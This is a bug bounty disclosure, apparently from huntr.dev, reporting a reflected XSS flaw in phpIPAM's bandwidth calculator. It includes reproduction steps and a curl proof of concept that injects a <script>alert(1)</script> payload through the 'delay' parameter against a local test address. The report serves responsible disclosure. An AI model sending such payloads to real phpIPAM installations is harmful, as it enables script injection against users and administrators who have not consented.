Cross Site Scripting (XSS) Reflected

2022-11-0106:07:53

z3n70

www.huntr.dev

cross site scripting

reflected

http request

response

burpsuite

payload

curl

bug bounty

EPSS

0.001

Percentile

30.7%

JSON

Description

Reflected cross-site scripting (or XSS) arises when an application receives data in an HTTP request and includes that data within the immediate response in an unsafe way.

Proof of Concept

1. i open this page localhost/phpipam/index.php?page=tools&section=ip-calculator&subnetId=bw-calculator
2. and i analysis code line 41-45 https://github.com/phpipam/phpipam/blob/master/app/tools/ip-calculator/bw-calculator-result.php
3. next i tried with burpsuite to intercept and then change the value of some parameters such as wsize, delay and fsize on line 13-15 https://github.com/phpipam/phpipam/blob/master/app/tools/ip-calculator/ bw-calculator-result.php with &lt;script&gt;alert(1)&lt;/script&gt; payload
4. and i trigger payload xss reflected &lt;script&gt;alert(1)&lt;/script&gt;

//PoC
curl -i -s -k -X $'POST' \
    -H $'Host: 192.168.1.15' -H $'Content-Length: 54' -H $'Accept: */*' -H $'X-Requested-With: XMLHttpRequest' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Origin: http://192.168.1.15' -H $'Referer: http://192.168.1.15/phpipam/index.php?page=tools&section=ip-calculator&subnetId=bw-calculator' -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US,en;q=0.9,id;q=0.8' -H $'Connection: close' \
    -b $'sectionSubnets.bs.table.searchText=; table-page-size=50; phpipam=p4jub8nb4ou2a95kso4ed22aom' \
    --data-binary $'wsize=50000&delay=&lt;script&gt;alert(1)&lt;/script&gt;&fsize=1024' \
    $'http://192.168.1.15/phpipam/app/tools/ip-calculator/bw-calculator-result.php'